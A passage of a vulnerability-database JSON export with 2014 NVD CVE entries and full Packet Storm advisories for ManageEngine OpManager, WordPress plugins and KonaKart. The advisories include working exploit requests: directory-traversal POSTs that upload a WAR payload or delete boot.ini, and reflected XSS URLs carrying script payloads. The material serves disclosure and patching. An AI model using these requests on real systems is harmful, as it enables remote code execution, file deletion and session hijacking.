"https://github.com/phpmyadmin/phpmyadmin/commit/29a1f56495a7d1d98da31a614f23c0819a606a4d", "https://security.gentoo.org/glsa/201505-03", "http://www.phpmyadmin.net/home_page/security/PMASA-2014-6.php"], "edition": 2, "description": "Multiple cross-site scripting (XSS) vulnerabilities in js/functions.js in phpMyAdmin 4.0.x before 4.0.10.1, 4.1.x before 4.1.14.2, and 4.2.x before 4.2.6 allow remote authenticated users to inject arbitrary web script or HTML via a crafted (1) table name or (2) column name that is improperly handled during construction of an AJAX confirmation message.", "reporter": "NVD", "published": "2014-07-20T07:12:51", "title": "CVE-2014-4986", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "cve", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-4986"], "scanner": [], "modified": "2016-12-21T21:59:16", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin:4.2.5", "cpe:/a:phpmyadmin:phpmyadmin:4.1.13", "cpe:/a:phpmyadmin:phpmyadmin:4.1.5", "cpe:/a:phpmyadmin:phpmyadmin:4.1.14", "cpe:/a:phpmyadmin:phpmyadmin:4.1.11", "cpe:/a:phpmyadmin:phpmyadmin:4.1.7", "cpe:/a:phpmyadmin:phpmyadmin:4.0.5", "cpe:/a:phpmyadmin:phpmyadmin:4.1.10", "cpe:/a:phpmyadmin:phpmyadmin:4.0.10.0", "cpe:/a:phpmyadmin:phpmyadmin:4.1.3", "cpe:/a:phpmyadmin:phpmyadmin:4.0.6", "cpe:/a:phpmyadmin:phpmyadmin:4.0.2", "cpe:/a:phpmyadmin:phpmyadmin:4.2.3", "cpe:/a:phpmyadmin:phpmyadmin:4.2.4", "cpe:/a:phpmyadmin:phpmyadmin:4.0.9", "cpe:/a:phpmyadmin:phpmyadmin:4.1.8", "cpe:/a:phpmyadmin:phpmyadmin:4.1.2", "cpe:/a:phpmyadmin:phpmyadmin:4.0.8", "cpe:/a:phpmyadmin:phpmyadmin:4.0.4", "cpe:/a:phpmyadmin:phpmyadmin:4.0.4.2", "cpe:/a:phpmyadmin:phpmyadmin:4.0.0:rc3", "cpe:/a:phpmyadmin:phpmyadmin:4.1.4", "cpe:/a:phpmyadmin:phpmyadmin:4.1.1", "cpe:/a:phpmyadmin:phpmyadmin:4.2.1", "cpe:/a:phpmyadmin:phpmyadmin:4.0.1", "cpe:/a:phpmyadmin:phpmyadmin:4.0.10", "cpe:/a:phpmyadmin:phpmyadmin:4.0.7", "cpe:/a:phpmyadmin:phpmyadmin:4.1.0", "cpe:/a:phpmyadmin:phpmyadmin:4.1.9", "cpe:/a:phpmyadmin:phpmyadmin:4.0.0", "cpe:/a:phpmyadmin:phpmyadmin:4.2.0", "cpe:/a:phpmyadmin:phpmyadmin:4.2.2", "cpe:/a:phpmyadmin:phpmyadmin:4.1.14.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.12", "cpe:/a:phpmyadmin:phpmyadmin:4.1.6", "cpe:/a:phpmyadmin:phpmyadmin:4.0.4.1", "cpe:/a:phpmyadmin:phpmyadmin:4.0.3", "cpe:/a:phpmyadmin:phpmyadmin:4.0.0:rc2"], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4986", "id": "CVE-2014-4986", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-09-08T10:26:59", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/96204", "http://www.exploit-db.com/exploits/34781", "http://packetstormsecurity.com/files/128419/All-In-One-WP-Security-3.8.2-SQL-Injection.html", "https://www.htbridge.com/advisory/HTB23231", "http://www.securityfocus.com/bid/70150", "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/changelog", "http://www.securityfocus.com/archive/1/archive/1/533519/100/0/threaded"], "edition": 2, "description": "Multiple SQL injection vulnerabilities in the All In One WP Security & Firewall plugin before 3.8.3 for WordPress allow remote authenticated users to execute arbitrary SQL commands via the (1) orderby or (2) order parameter in the aiowpsec page to wp-admin/admin.php. NOTE: this can be leveraged using CSRF to allow remote attackers to execute arbitrary SQL commands.", "reporter": "NVD", "published": "2014-10-02T10:55:04", "title": "CVE-2014-6242", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-6242"], "scanner": [], "cpe": ["cpe:/a:tips_and_tricks_hq:all_in_one_wordpress_security_and_firewall:3.8.2::~~~wordpress~~"], "modified": "2017-09-07T21:29:13", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6242", "id": "CVE-2014-6242", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-03T20:59:36", "references": ["http://seclists.org/fulldisclosure/2014/Sep/110", "https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix", "https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt"], "edition": 1, "description": "Directory traversal vulnerability in the multipartRequest servlet in ZOHO ManageEngine OpManager 11.3 and earlier, Social IT Plus 11.0, and IT360 10.3, 10.4, and earlier allows remote attackers or remote authenticated users to delete arbitrary files via a .. (dot dot) in the fileName parameter.", "reporter": "NVD", "published": "2014-12-04T12:59:04", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "CVE-2014-6036", "type": "cve", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-6036"], "scanner": [], "modified": "2014-12-05T08:39:27", "cpe": ["cpe:/a:zohocorp:manageengine_social_it_plus:11.0", "cpe:/a:zohocorp:manageengine_opmanager:11.3", "cpe:/a:zohocorp:manageengine_it360:10.3", "cpe:/a:zohocorp:manageengine_it360:10.4"], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6036", "id": "CVE-2014-6036", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-03T20:59:36", "references": ["http://seclists.org/fulldisclosure/2014/Sep/110", "https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix", "https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt"], "edition": 1, "description": "Directory traversal vulnerability in the FileCollector servlet in ZOHO ManageEngine OpManager 11.4, 11.3, and earlier allows remote attackers to write and execute arbitrary files via a .. (dot dot) in the FILENAME parameter.", "reporter": "NVD", "published": "2014-12-04T12:59:03", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "CVE-2014-6035", "type": "cve", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-6035"], "scanner": [], "modified": "2014-12-05T08:33:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager:11.3", "cpe:/a:zohocorp:manageengine_opmanager:11.4"], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6035", "id": "CVE-2014-6035", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-09-08T10:26:57", "references": ["http://www.securityfocus.com/bid/69365", "http://advisories.mageia.org/MGASA-2014-0380.html", "http://seclists.org/oss-sec/2014/q3/445", "http://seclists.org/oss-sec/2014/q3/444", "http://www.mandriva.com/security/advisories?name=MDVSA-2014:182", "https://exchange.xforce.ibmcloud.com/vulnerabilities/95452"], "edition": 2, "description": "Zarafa 5.00 uses world-readable permissions for the files in the log directory, which allows local users to obtain sensitive information by reading the log files.", "reporter": "NVD", "published": "2014-10-20T11:55:04", "title": "CVE-2014-5448", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-5448"], "scanner": [], "cpe": ["cpe:/a:zarafa:zarafa:5.00"], "modified": "2017-09-07T21:29:06", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5448", "id": "CVE-2014-5448", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-09-08T10:27:01", "references": ["http://packetstormsecurity.com/files/128626/WordPress-Google-Calendar-Events-2.0.1-Cross-Site-Scripting.html", "http://www.securityfocus.com/bid/70370", "https://wordpress.org/plugins/google-calendar-events/changelog", "https://exchange.xforce.ibmcloud.com/vulnerabilities/96867", "https://www.htbridge.com/advisory/HTB23235", "https://github.com/pderksen/WP-Google-Calendar-Events/commit/a701ceeb410bdda9d96c9d3d12104630df5d5b43", "http://www.securityfocus.com/archive/1/archive/1/533640/100/0/threaded"], "edition": 2, "description": "Cross-site scripting (XSS) vulnerability in the Google Calendar Events plugin before 2.0.4 for WordPress allows remote attackers to inject arbitrary web script or HTML via the gce_feed_ids parameter in a gce_ajax action to wp-admin/admin-ajax.php.", "reporter": "NVD", "published": "2014-10-16T15:55:14", "title": "CVE-2014-7138", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-7138"], "scanner": [], "cpe": ["cpe:/a:google_calendar_events_project:google_calendar_events:2.0.3.1::~~~wordpress~~"], "modified": "2017-09-07T21:29:14", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7138", "id": "CVE-2014-7138", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-09-03T21:15:41", "references": ["https://github.com/phpmyadmin/phpmyadmin/commit/c1a3f85fbd1a9569646e7cf1b791325ae82c7961", "http://lists.opensuse.org/opensuse-updates/2014-10/msg00009.html", "http://www.securityfocus.com/bid/70252", "http://www.phpmyadmin.net/home_page/security/PMASA-2014-11.php", "https://github.com/phpmyadmin/phpmyadmin/commit/304fb2b645b36a39e03b954fdbd567173ebe6448"], "edition": 1, "description": "Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 4.0.x before 4.0.10.4, 4.1.x before 4.1.14.5, and 4.2.x before 4.2.9.1 allow remote authenticated users to inject arbitrary web script or HTML via a crafted ENUM value that is improperly handled during rendering of the (1) table search or (2) table structure page, related to libraries/TableSearch.class.php and libraries/Util.class.php.", "reporter": "NVD", "published": "2014-10-02T21:55:08", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "title": "CVE-2014-7217", "type": "cve", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-7217"], "scanner": [], "modified": "2016-04-04T09:15:00", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin:4.2.5", "cpe:/a:phpmyadmin:phpmyadmin:4.1.13", "cpe:/a:phpmyadmin:phpmyadmin:4.1.5", "cpe:/a:phpmyadmin:phpmyadmin:4.2.8", "cpe:/a:phpmyadmin:phpmyadmin:4.1.14", "cpe:/a:phpmyadmin:phpmyadmin:4.1.11", "cpe:/a:phpmyadmin:phpmyadmin:4.1.7", "cpe:/a:phpmyadmin:phpmyadmin:4.0.5", "cpe:/a:phpmyadmin:phpmyadmin:4.1.10", "cpe:/a:phpmyadmin:phpmyadmin:4.2.9", "cpe:/a:phpmyadmin:phpmyadmin:4.1.3", "cpe:/a:phpmyadmin:phpmyadmin:4.0.6", "cpe:/a:phpmyadmin:phpmyadmin:4.0.2", "cpe:/a:phpmyadmin:phpmyadmin:4.2.3", "cpe:/a:phpmyadmin:phpmyadmin:4.2.4", "cpe:/a:phpmyadmin:phpmyadmin:4.2.7", "cpe:/a:phpmyadmin:phpmyadmin:4.0.9", "cpe:/a:phpmyadmin:phpmyadmin:4.1.8", "cpe:/a:phpmyadmin:phpmyadmin:4.1.2", "cpe:/a:phpmyadmin:phpmyadmin:4.0.8", "cpe:/a:phpmyadmin:phpmyadmin:4.0.4", "cpe:/a:phpmyadmin:phpmyadmin:4.0.4.2", "cpe:/a:phpmyadmin:phpmyadmin:4.0.0:rc3", "cpe:/a:phpmyadmin:phpmyadmin:4.1.4", "cpe:/a:phpmyadmin:phpmyadmin:4.1.1", "cpe:/a:phpmyadmin:phpmyadmin:4.2.1", "cpe:/a:phpmyadmin:phpmyadmin:4.0.1", "cpe:/a:phpmyadmin:phpmyadmin:4.0.7", "cpe:/a:phpmyadmin:phpmyadmin:4.1.0", "cpe:/a:phpmyadmin:phpmyadmin:4.2.8.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.9", "cpe:/a:phpmyadmin:phpmyadmin:4.0.0", "cpe:/a:phpmyadmin:phpmyadmin:4.2.0", "cpe:/a:phpmyadmin:phpmyadmin:4.2.7.1", "cpe:/a:phpmyadmin:phpmyadmin:4.2.2", "cpe:/a:phpmyadmin:phpmyadmin:4.1.14.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.12", "cpe:/a:phpmyadmin:phpmyadmin:4.1.14.4", "cpe:/a:phpmyadmin:phpmyadmin:4.1.6", "cpe:/a:phpmyadmin:phpmyadmin:4.0.4.1", "cpe:/a:phpmyadmin:phpmyadmin:4.0.3", "cpe:/a:phpmyadmin:phpmyadmin:4.0.0:rc2", "cpe:/a:phpmyadmin:phpmyadmin:4.1.14.3"], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7217", "id": "CVE-2014-7217", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:23:53", "references": [], "edition": 1, "description": "", "reporter": "Pedro Ribeiro", "published": "2014-09-29T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "packetstorm", "title": "ManageEngine Code Execution / File Deletion", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6035", "CVE-2014-6034", "CVE-2014-6036"], "modified": "2014-09-29T00:00:00", "href": "https://packetstormsecurity.com/files/128474/ManageEngine-Code-Execution-File-Deletion.html", "id": "PACKETSTORM:128474", "sourceData": "`Hi, \n \nThis is the fifth part of the ManageOwnage series. For previous parts, see: \nhttp://seclists.org/fulldisclosure/2014/Aug/55 \nhttp://seclists.org/fulldisclosure/2014/Aug/75 \nhttp://seclists.org/fulldisclosure/2014/Aug/88 \nhttp://seclists.org/fulldisclosure/2014/Sep/1 \n \nThis time we have a file upload with directory traversal as well as an \narbitrary file deletion vulnerability. The file upload can be abused \nto deliver a WAR payload in the Tomcat webapps directory, which will \ndeploy a malicious Servlet allowing the attacker to execute arbitrary \ncode. \n \nDetails are below, and the usual Metasploit module has been submitted \nand should be available soon (see pull request \nhttps://github.com/rapid7/metasploit-framework/pull/3903). \n \n \n>> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360 \n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security \n========================================================================== \n \n>> Background on the affected products: \n\"ManageEngine OpManager is a network and data center infrastructure \nmanagement software that helps large enterprises, service providers \nand SMEs manage their data centers and IT infrastructure efficiently \nand cost effectively. Automated workflows, intelligent alerting \nengines, configurable discovery rules, and extendable templates enable \nIT teams to setup a 24x7 monitoring system within hours of \ninstallation.\" \n \n\"Social IT Plus offers a cascading wall that helps IT folks to start \ndiscussions, share articles and videos easily and quickly. Other team \nmembers can access it and post comments and likes on the fly.\" \n \n\"Managing mission critical business applications is now made easy \nthrough ManageEngine IT360. With agentless monitoring methodology, \nmonitor your applications, servers and databases with ease. Agentless \nmonitoring of your business applications enables you high ROI and low \nTOC. With integrated network monitoring and bandwidth utilization, \nquickly troubleshoot any performance related issue with your network \nand assign issues automatically with ITIL based ServiceDesk \nintegration.\" \n \n \n>> Technical details: \n#1 \nVulnerability: Remote code execution via WAR file upload \nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360 \n \na) \nCVE-2014-6034 \nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war \nAffected versions: OpManager v8.8 to v11.3; Social IT Plus v11.0; \nIT360 v? to v10.4 \nA Metasploit module that exploits this vulnerability has been released. \n \nb) \nCVE-2014-6035 \nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war \nAffected versions: OpManager v? to v11.3 \n \n \n#2 \nVulnerability: Arbitrary file deletion \nCVE-2014-6036 \nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360 \nAffected versions: OpManager v? to v11.3; Social IT Plus v11.0; IT360 \nv? to v10.4 \n \nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini \n \n \n>> Fix: \nUpgrade to OpManager 11.3, then install the patch in \nhttps://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix \nThis patch can be applied to all the applications but only for the \nlatest version of each (OpManager 11.3, Social IT 11.0, IT360 10.4). \nManageEngine have indicated that the soon to be released OpManager \nversion 11.4 might not have the fix as the release is almost ready. \nThey are planning to include the fix in OpManager version 11.5 which \nshould be released sometime in late November or December 2014. No \nindication was given for when fixed versions of IT360 and Social IT \nPlus will be released. \n \nA copy of the advisory above can be found at my repo: \nhttps://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt \n \nRegards, \nPedro \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/128474/meopmanager-execlfi.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:18:53", "references": [], "edition": 1, "description": "", "reporter": "High-Tech Bridge SA", "published": "2014-10-10T00:00:00", "type": "packetstorm", "title": "WordPress Google Calendar Events 2.0.1 Cross Site Scripting", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-7138"], "modified": "2014-10-10T00:00:00", "href": "https://packetstormsecurity.com/files/128626/WordPress-Google-Calendar-Events-2.0.1-Cross-Site-Scripting.html", "id": "PACKETSTORM:128626", "sourceData": "`Advisory ID: HTB23235 \nProduct: Google Calendar Events WordPress plugin \nVendor: Phil Derksen \nVulnerable Version(s): 2.0.1 and probably prior \nTested Version: 2.0.1 \nAdvisory Publication: September 17, 2014 [without technical details] \nVendor Notification: September 17, 2014 \nVendor Patch: October 7, 2014 \nPublic Disclosure: October 8, 2014 \nVulnerability Type: Cross-Site Scripting [CWE-79] \nCVE Reference: CVE-2014-7138 \nRisk Level: Low \nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered vulnerability in Google Calendar Events WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrator of a WordPress website with vulnerable plugin. \n \n \n1) Reflected Cross-Site Scripting (XSS) in Google Calendar Events WordPress Plugin: CVE-2014-7138 \n \nInput passed via the \"gce_feed_ids\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://wordpress/wp-admin/admin-ajax.php?action=gce_ajax&gce_type=page&gce_feed_ids=%27%22%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E \n \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to Google Calendar Events 2.0.4 \n \nMore Information: \nhttps://github.com/pderksen/WP-Google-Calendar-Events/commit/df1fe1d71f8ce9496cc601c96839c474e49db91d \nhttps://github.com/pderksen/WP-Google-Calendar-Events/commit/a701ceeb410bdda9d96c9d3d12104630df5d5b43 \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23235 - https://www.htbridge.com/advisory/HTB23235 - Reflected Cross-Site Scripting (XSS) in Google Calendar Events WordPress Plugin. \n[2] Google Calendar Events WordPress plugin - http://philderksen.com/ - Parses Google Calendar feeds and displays the events as a calendar grid or list on a page, post or widget. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128626/wpgce-xss.txt"}, {"lastseen": "2016-12-05T22:15:29", "references": [], "edition": 1, "description": "", "reporter": "High-Tech Bridge SA", "published": "2014-10-01T00:00:00", "type": "packetstorm", "title": "WordPress Photo Gallery 1.1.30 Cross Site Scripting", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6315"], "modified": "2014-10-01T00:00:00", "href": "https://packetstormsecurity.com/files/128518/WordPress-Photo-Gallery-1.1.30-Cross-Site-Scripting.html", "id": "PACKETSTORM:128518", "sourceData": "`Advisory ID: HTB23232 \nProduct: Photo Gallery WordPress plugin \nVendor: http://web-dorado.com/ \nVulnerable Version(s): 1.1.30 and probably prior \nTested Version: 1.1.30 \nAdvisory Publication: September 10, 2014 [without technical details] \nVendor Notification: September 10, 2014 \nVendor Patch: September 10, 2014 \nPublic Disclosure: October 1, 2014 \nVulnerability Type: Cross-Site Scripting [CWE-79] \nCVE Reference: CVE-2014-6315 \nRisk Level: Low \nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered three vulnerabilities in Photo Gallery WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks. \n \n \n1) Cross-Site Scripting (XSS) in Photo Gallery WordPress plugin: CVE-2014-6315 \n \n1.1 Input passed via the \"callback\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=jpg&callback=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E \n \n1.2 Input passed via the \"dir\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=jpg&dir=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E \n \n1.3 Input passed via the \"extensions\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E \n \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to Photo Gallery 1.1.31 \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23232 - https://www.htbridge.com/advisory/HTB23232 - Cross-Site Scripting (XSS) in Photo Gallery WordPress plugin. \n[2] Photo Gallery WordPress plugin - http://web-dorado.com/ - This plugin is a fully responsive gallery plugin with advanced functionality. It allows having different image galleries for your posts and pages. You can create unlimited number of galleries, combine them into albums, and provide descriptions and tags. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128518/wpphotogallery1130-xss.txt"}, {"lastseen": "2016-12-05T22:16:11", "references": [], "edition": 1, "description": "", "reporter": "Christian Schneider", "published": "2014-09-22T00:00:00", "type": "packetstorm", "title": "KonaKart Storefront Application Cross Site Request Forgery", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-5516"], "modified": "2014-09-22T00:00:00", "href": "https://packetstormsecurity.com/files/128342/KonaKart-Storefront-Application-Cross-Site-Request-Forgery.html", "id": "PACKETSTORM:128342", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \n \nCVE-2014-5516 \n=================== \n\"Cross-Site Request Forgery (CSRF) protection bypass\" (CWE-352) vulnerability \nin \"KonaKart Storefront Application\" Enterprise Java eCommerce product \n \n \nVendor \n=================== \nDS Data Systems (UK) Ltd. \n \n \nProduct \n=================== \n\"KonaKart is an affordable java based shopping cart software solution for online retailers. \nLet KonaKart help increase your eCommerce sales.\" \n- source: http://www.konakart.com \n \n\"KonaKart is a Java eCommerce system aimed at medium to large online retailers.\" \n- source: https://en.wikipedia.org/wiki/KonaKart \n \n \nAffected versions \n=================== \nThis vulnerability affects versions of KonaKart Storefront Application prior to 7.3.0.0 \n \n \nPatch \n=================== \nThe vendor has released a XSRF fix as part of version 7.3.0.0 at \nhttp://www.konakart.com/downloads/ver-7-3-0-0-whats-new \n \n \nReported by \n=================== \nThis issue was reported to the vendor by Christian Schneider (@cschneider4711) \nfollowing a responsible disclosure process. \n \n \nSeverity \n=================== \nMedium \n \n \nDescription \n=================== \nThe existing CSRF protection token was checked for every POST request \nproperly. When modifying the request from POST method to GET method \nall state-changing actions worked as well, but the CSRF token protection \nwas no longer enforced, allowing CSRF attacks. \n \n \nEscalation potential \n==================== \nExploitation demonstration was responsibly provided along with the vulnerability \nreport to the vendor, which changed a victim's mail address (using the CSRF \nprotection bypass) to an attacker-supplied mail address, allowing a successful \nreset of victim's account password by the attacker. \n \n \nTimeline \n=================== \n2014-05-02 Vulnerability discovered \n2014-05-02 Vulnerability responsibly reported to vendor \n2014-05-02 Reply from vendor acknowledging report \n2014-??-?? Vendor released patch as part of version 7.3.0.0 \n2014-09-20 Advisory published via BugTraq \n \n \nReferences \n=================== \nhttp://www.konakart.com/downloads/ver-7-3-0-0-whats-new \nhttp://www.christian-schneider.net/advisories/CVE-2014-5516.txt \n \n \n \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.4.9 (Darwin) \n \niEYEARECAAYFAlQd69cACgkQXYAsOfddvFOTVACgr/f5+x5kf60t5LaCqhH0pvSY \nQYoAnjiI0WSa3iGuw/OfXk3/vLV+liFm \n=61mn \n-----END PGP SIGNATURE----- \n`\n", "cvss": {"score": 3.7, "vector": "AV:NETWORK/AC:MEDIUM/Au:UNKNOWN/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128342/konakart-xsrf.txt"}, {"lastseen": "2016-12-05T22:19:36", "references": [], "edition": 1, "description": "", "reporter": "High-Tech Bridge SA", "published": "2014-10-10T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "packetstorm", "title": "WordPress Contact Form DB 2.8.13 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-7139"], "modified": "2014-10-10T00:00:00", "href": "https://packetstormsecurity.com/files/128625/WordPress-Contact-Form-DB-2.8.13-Cross-Site-Scripting.html", "id": "PACKETSTORM:128625", "sourceData": "`Advisory 